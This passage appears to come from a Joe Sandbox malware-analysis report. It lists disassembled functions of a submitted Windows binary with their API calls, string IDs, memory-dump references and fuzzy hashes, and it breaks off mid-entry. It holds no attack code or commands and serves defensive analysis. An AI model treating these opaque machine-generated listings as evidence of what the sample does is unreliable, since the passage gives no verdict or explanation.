              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
              • String ID: 0$F
              • API String ID: 176399719-3044882817
              • Opcode ID: d2740ad2990768824f0b67ba07c9f731c8e8a603cc2d44882589d4afdc3e1ada
              • Instruction ID: 3dc54189f644672454cf4bb616bbc710e24577d28ed7c94e3090b960c58137ab
              • Opcode Fuzzy Hash: d2740ad2990768824f0b67ba07c9f731c8e8a603cc2d44882589d4afdc3e1ada
              • Instruction Fuzzy Hash: 21413879A10306EFDB20DF64E988A9ABBB5FF49310F144029F955973A2D731A924CF50
              Function 0020772A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
              Download Yara Rule
              APIs
              • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 002077CD
              • CreateCompatibleDC.GDI32(00000000), ref: 002077D4
              • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 002077E7
              • SelectObject.GDI32(00000000,00000000), ref: 002077EF
              • GetPixel.GDI32(00000000,00000000,00000000), ref: 002077FA
              • DeleteDC.GDI32(00000000), ref: 00207803
              • GetWindowLongW.USER32(?,000000EC), ref: 0020780D
              • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00207821
              • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0020782D
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
              • String ID: static
              • API String ID: 2559357485-2160076837
              • Opcode ID: 5ca803accd0b38332c15e3d324559c853b7cb9bf6fc8b9ad473bedeaeaaf8def
              • Instruction ID: 144a5753530fc947fb507264e57fb95249242b2f5466239e5c9060d8345c4466
              • Opcode Fuzzy Hash: 5ca803accd0b38332c15e3d324559c853b7cb9bf6fc8b9ad473bedeaeaaf8def
              • Instruction Fuzzy Hash: DC317A32554215ABDB229FA4EC4CFDA3B69EF09360F104224FA15A60E2D731A821DBA4
              Function 001A7040 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
              Download Yara Rule
              APIs
              • _memset.LIBCMT ref: 001A707B
                • Part of subcall function 001A8D68: __getptd_noexit.LIBCMT ref: 001A8D68
              • __gmtime64_s.LIBCMT ref: 001A7114
              • __gmtime64_s.LIBCMT ref: 001A714A
              • __gmtime64_s.LIBCMT ref: 001A7167
              • __allrem.LIBCMT ref: 001A71BD
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001A71D9
              • __allrem.LIBCMT ref: 001A71F0
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001A720E
              • __allrem.LIBCMT ref: 001A7225
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001A7243
              • __invoke_watson.LIBCMT ref: 001A72B4
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
              • String ID:
              • API String ID: 384356119-0
              • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
              • Instruction ID: 3d8f4cc58fa202f80f168f246cab22599f193b440ee9622b479e9011c4ef8302
              • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
              • Instruction Fuzzy Hash: 0271D775A04716ABD714AE79CD41BAAB3A8EF26324F14423BF514E72C1E770EB5087D0
              Function 001E2A16 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
              Download Yara Rule
              APIs
              • _memset.LIBCMT ref: 001E2A31
              • GetMenuItemInfoW.USER32(00246890,000000FF,00000000,00000030), ref: 001E2A92
              • SetMenuItemInfoW.USER32(00246890,00000004,00000000,00000030), ref: 001E2AC8
              • Sleep.KERNEL32(000001F4), ref: 001E2ADA
              • GetMenuItemCount.USER32(?), ref: 001E2B1E
              • GetMenuItemID.USER32(?,00000000), ref: 001E2B3A
              • GetMenuItemID.USER32(?,-00000001), ref: 001E2B64
              • GetMenuItemID.USER32(?,?), ref: 001E2BA9
              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 001E2BEF
              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001E2C03
              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001E2C24
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
              • String ID:
              • API String ID: 4176008265-0
              • Opcode ID: 4d46ca83fd82662d174b50b55087a668e84953b3ced692f4f68fd2c277a6ca09
              • Instruction ID: 37f1207fbfc6909fd8e8fb5f64d0024078747e8fcb51c4390fb52e7eea975bcd
              • Opcode Fuzzy Hash: 4d46ca83fd82662d174b50b55087a668e84953b3ced692f4f68fd2c277a6ca09
              • Instruction Fuzzy Hash: 5D61C0B0900B89AFDB21CF65DDA8EBEBBBCEB41304F240569F84193251D771AD45DB21
              Function 00207192 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
              Download Yara Rule
              APIs
              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00207214
              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00207217
              • GetWindowLongW.USER32(?,000000F0), ref: 0020723B
              • _memset.LIBCMT ref: 0020724C
              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0020725E
              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 002072D6
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: MessageSend$LongWindow_memset
              • String ID:
              • API String ID: 830647256-0
              • Opcode ID: cf58f91a9d18ef26997ecaf66929f6e0b424ee2c2b9e5a45a194cee7ee67620b
              • Instruction ID: 4a5e1dc636576f486d127e886acc1f0cc3706e2ee1a2e9ac4bb1ccf29ef509c8
              • Opcode Fuzzy Hash: cf58f91a9d18ef26997ecaf66929f6e0b424ee2c2b9e5a45a194cee7ee67620b
              • Instruction Fuzzy Hash: AA616C75910309AFDB20DFA4CC85EEE77B8EB09710F140199FA14A72E2D770AD55DB60
              Function 001D710E Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
              Download Yara Rule
              APIs
              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 001D7135
              • SafeArrayAllocData.OLEAUT32(?), ref: 001D718E
              • VariantInit.OLEAUT32(?), ref: 001D71A0
              • SafeArrayAccessData.OLEAUT32(?,?), ref: 001D71C0
              • VariantCopy.OLEAUT32(?,?), ref: 001D7213
              • SafeArrayUnaccessData.OLEAUT32(?), ref: 001D7227
              • VariantClear.OLEAUT32(?), ref: 001D723C
              • SafeArrayDestroyData.OLEAUT32(?), ref: 001D7249
              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 001D7252
              • VariantClear.OLEAUT32(?), ref: 001D7264
              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 001D726F
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
              • String ID:
              • API String ID: 2706829360-0
              • Opcode ID: 88db335dd251db1ec228b8359611dd05b6b7e001525723cafe5284b2a12af5d0
              • Instruction ID: 2996f52feecef788eda123db3a384f37afe68ca319f43e904cc3d5ede453e35b
              • Opcode Fuzzy Hash: 88db335dd251db1ec228b8359611dd05b6b7e001525723cafe5284b2a12af5d0
              • Instruction Fuzzy Hash: 86415135900219AFCF14DFA4DD889AEBBB8FF18354F00806AF955A7762DB30A945CF90
              Function 001F86D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00189997: __itow.LIBCMT ref: 001899C2
                • Part of subcall function 00189997: __swprintf.LIBCMT ref: 00189A0C
              • CoInitialize.OLE32 ref: 001F8718
              • CoUninitialize.OLE32 ref: 001F8723
              • CoCreateInstance.OLE32(?,00000000,00000017,00212BEC,?), ref: 001F8783
              • IIDFromString.OLE32(?,?), ref: 001F87F6
              • VariantInit.OLEAUT32(?), ref: 001F8890
              • VariantClear.OLEAUT32(?), ref: 001F88F1
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
              • API String ID: 834269672-1287834457
              • Opcode ID: 47d5a4b41131da3e93e5205e0c70b111dca9f30ccfb474a655aae1fe2298537e
              • Instruction ID: 7df47fc99a9342ad4374ddb13a9d536350aa945fb760898df08dff9795171a65
              • Opcode Fuzzy Hash: 47d5a4b41131da3e93e5205e0c70b111dca9f30ccfb474a655aae1fe2298537e
              • Instruction Fuzzy Hash: EC61F0706083059FD710EF24C988B6FBBE8AF98754F14491DFA859B291CB30ED48CB92
              Function 001F5A45 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
              Download Yara Rule
              APIs
              • WSAStartup.WSOCK32(00000101,?), ref: 001F5AA6
              • inet_addr.WSOCK32(?,?,?), ref: 001F5AEB
              • gethostbyname.WSOCK32(?), ref: 001F5AF7
              • IcmpCreateFile.IPHLPAPI ref: 001F5B05
              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 001F5B75
              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 001F5B8B
              • IcmpCloseHandle.IPHLPAPI(00000000), ref: 001F5C00
              • WSACleanup.WSOCK32 ref: 001F5C06
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
              • String ID: Ping
              • API String ID: 1028309954-2246546115
              • Opcode ID: 91dad883f65b82a984d2d6b066816f083b7408344f7cf152b00a7a1b7adc3589
              • Instruction ID: 2c54c1b792716c8f5abadf1b23acbd9e9057fdef493fa71b8d664586b7e5ca0a
              • Opcode Fuzzy Hash: 91dad883f65b82a984d2d6b066816f083b7408344f7cf152b00a7a1b7adc3589
              • Instruction Fuzzy Hash: 11517031644B009FD721AF24DC49B3AB7E6EF48710F148969F656DB2A1DB70E940CB52
              Function 001EB72E Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
              Download Yara Rule
              APIs
              • SetErrorMode.KERNEL32(00000001), ref: 001EB73B
              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 001EB7B1
              • GetLastError.KERNEL32 ref: 001EB7BB
              • SetErrorMode.KERNEL32(00000000,READY), ref: 001EB828
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Error$Mode$DiskFreeLastSpace
              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
              • API String ID: 4194297153-14809454
              • Opcode ID: c1b08051bd7cd57a64cac547b8e168172e0d972e4f6943d62c23448b3d4f8b6f
              • Instruction ID: 5dd18ef82790d3706db4c464df3affe41ed0fc808d0a1890ff84b5699d47cd0d
              • Opcode Fuzzy Hash: c1b08051bd7cd57a64cac547b8e168172e0d972e4f6943d62c23448b3d4f8b6f
              • Instruction Fuzzy Hash: 3B31CF34A046489FDB14EF65C8C5EBFBBB8EF98700F144029F402972D2DB719A42CB91
              Function 001D9471 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00187F41: _memmove.LIBCMT ref: 00187F82
                • Part of subcall function 001DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 001DB0E7
              • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 001D94F6
              • GetDlgCtrlID.USER32 ref: 001D9501
              • GetParent.USER32 ref: 001D951D
              • SendMessageW.USER32(00000000,?,00000111,?), ref: 001D9520
              • GetDlgCtrlID.USER32(?), ref: 001D9529
              • GetParent.USER32(?), ref: 001D9545
              • SendMessageW.USER32(00000000,?,?,00000111), ref: 001D9548
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: MessageSend$CtrlParent$ClassName_memmove
              • String ID: ComboBox$ListBox
              • API String ID: 1536045017-1403004172
              • Opcode ID: 099fc8d9c3bda2a69a4308c3e536883b1bb720cb506e5f7c220b7e1c3db37d8a
              • Instruction ID: 9fb1710b23eb6f66332d8699589505bed1c60b1776aabe4ae44cbe29a830e3a3
              • Opcode Fuzzy Hash: 099fc8d9c3bda2a69a4308c3e536883b1bb720cb506e5f7c220b7e1c3db37d8a
              • Instruction Fuzzy Hash: 4521B274900204ABCF05AF64DCC5DFEBB79EF55310F100226B562972E2DB7599199F20
              Function 001D955C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00187F41: _memmove.LIBCMT ref: 00187F82
                • Part of subcall function 001DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 001DB0E7
              • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 001D95DF
              • GetDlgCtrlID.USER32 ref: 001D95EA
              • GetParent.USER32 ref: 001D9606
              • SendMessageW.USER32(00000000,?,00000111,?), ref: 001D9609
              • GetDlgCtrlID.USER32(?), ref: 001D9612
              • GetParent.USER32(?), ref: 001D962E
              • SendMessageW.USER32(00000000,?,?,00000111), ref: 001D9631
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: MessageSend$CtrlParent$ClassName_memmove
              • String ID: ComboBox$ListBox
              • API String ID: 1536045017-1403004172
              • Opcode ID: 3f95965440452c1f161b44d22463388dfdead8ff1633ab015d3ac0686e0de83d
              • Instruction ID: 84bb17a103833f676468720f68fc70df309a1f8d8f317db5a5e1e8d49413eec3
              • Opcode Fuzzy Hash: 3f95965440452c1f161b44d22463388dfdead8ff1633ab015d3ac0686e0de83d
              • Instruction Fuzzy Hash: 1A21C574940204BBDF15AB60DCC5EFEBBB9EF59300F100116F921972A2DB769959DF20
              Function 001D9645 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
              Download Yara Rule
              APIs
              • GetParent.USER32 ref: 001D9651
              • GetClassNameW.USER32(00000000,?,00000100), ref: 001D9666
              • _wcscmp.LIBCMT ref: 001D9678
              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 001D96F3
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ClassMessageNameParentSend_wcscmp
              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
              • API String ID: 1704125052-3381328864
              • Opcode ID: eea8002daa99cc8786e168d6b82030c788b5a7ec94bd4f118ca2989997df4f15
              • Instruction ID: b6e0db4b4394416dc835d89b1929e52a9224d68c69e8d2ee9eadf9d7d8b1af6e
              • Opcode Fuzzy Hash: eea8002daa99cc8786e168d6b82030c788b5a7ec94bd4f118ca2989997df4f15
              • Instruction Fuzzy Hash: ED112C7B248307BAF6152620EC0BEA6779CCB17360F200127F910A55E1FF92E9914B58
              Function 001E4189 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON
              Download Yara Rule
              APIs
              • __swprintf.LIBCMT ref: 001E419D
              • __swprintf.LIBCMT ref: 001E41AA
                • Part of subcall function 001A38D8: __woutput_l.LIBCMT ref: 001A3931
              • FindResourceW.KERNEL32(?,?,0000000E), ref: 001E41D4
              • LoadResource.KERNEL32(?,00000000), ref: 001E41E0
              • LockResource.KERNEL32(00000000), ref: 001E41ED
              • FindResourceW.KERNEL32(?,?,00000003), ref: 001E420D
              • LoadResource.KERNEL32(?,00000000), ref: 001E421F
              • SizeofResource.KERNEL32(?,00000000), ref: 001E422E
              • LockResource.KERNEL32(?), ref: 001E423A
              • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 001E429B
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
              • String ID:
              • API String ID: 1433390588-0
              • Opcode ID: fd527068f36c77c7ed50c1310934e583e31ce867635b80758c63acfe4ea6a079
              • Instruction ID: 599767bb9972eceb5c0815cc35f73987b7d4cc4d0a5d2bdb1e6f0c63b2ddb222
              • Opcode Fuzzy Hash: fd527068f36c77c7ed50c1310934e583e31ce867635b80758c63acfe4ea6a079
              • Instruction Fuzzy Hash: 7531CDB5A0124AAFDB159F61ED88ABF7BACEF09301F004525FE11D6151E730DA118BA0
              Function 001E16DE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
              Download Yara Rule
              APIs
              • GetCurrentThreadId.KERNEL32 ref: 001E1700
              • GetForegroundWindow.USER32(00000000,?,?,?,?,?,001E0778,?,00000001), ref: 001E1714
              • GetWindowThreadProcessId.USER32(00000000), ref: 001E171B
              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,001E0778,?,00000001), ref: 001E172A
              • GetWindowThreadProcessId.USER32(?,00000000), ref: 001E173C
              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,001E0778,?,00000001), ref: 001E1755
              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,001E0778,?,00000001), ref: 001E1767
              • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,001E0778,?,00000001), ref: 001E17AC
              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,001E0778,?,00000001), ref: 001E17C1
              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,001E0778,?,00000001), ref: 001E17CC
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
              • String ID:
              • API String ID: 2156557900-0
              • Opcode ID: b04a309db0076e27cc0acf15feb01445365dc626ab1e050df909a993f898e707
              • Instruction ID: a620e725d62659b7ecb09a8b95eef19801e1f8efd1a8255cb98fa0938ad2a9cf
              • Opcode Fuzzy Hash: b04a309db0076e27cc0acf15feb01445365dc626ab1e050df909a993f898e707
              • Instruction Fuzzy Hash: F231DF79A00744BBEB25DF11FD8CB6D7BA9AB2AB51F114024F810C66A0DBB09D448F60
              Function 001F9428 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Variant$ClearInit$_memset
              • String ID: ,,!$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
              • API String ID: 2862541840-1342065348
              • Opcode ID: 7b1aa37183cb670320bf26521c6f8b6fb8439874b305cfc27d84d709d70f8e36
              • Instruction ID: c9526eb38ae211894b24340aecf7208e08b73faaa66416971b69b7333ce9287d
              • Opcode Fuzzy Hash: 7b1aa37183cb670320bf26521c6f8b6fb8439874b305cfc27d84d709d70f8e36
              • Instruction Fuzzy Hash: CB91CF70A00219ABDF24EFA5C848FBEB7B8EF55724F10815AF615EB290D7709945CFA0
              Function 001DA693 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
              Download Yara Rule
              APIs
              • EnumChildWindows.USER32(?,001DAA64), ref: 001DA9A2
              Strings
              Memory Dump Source
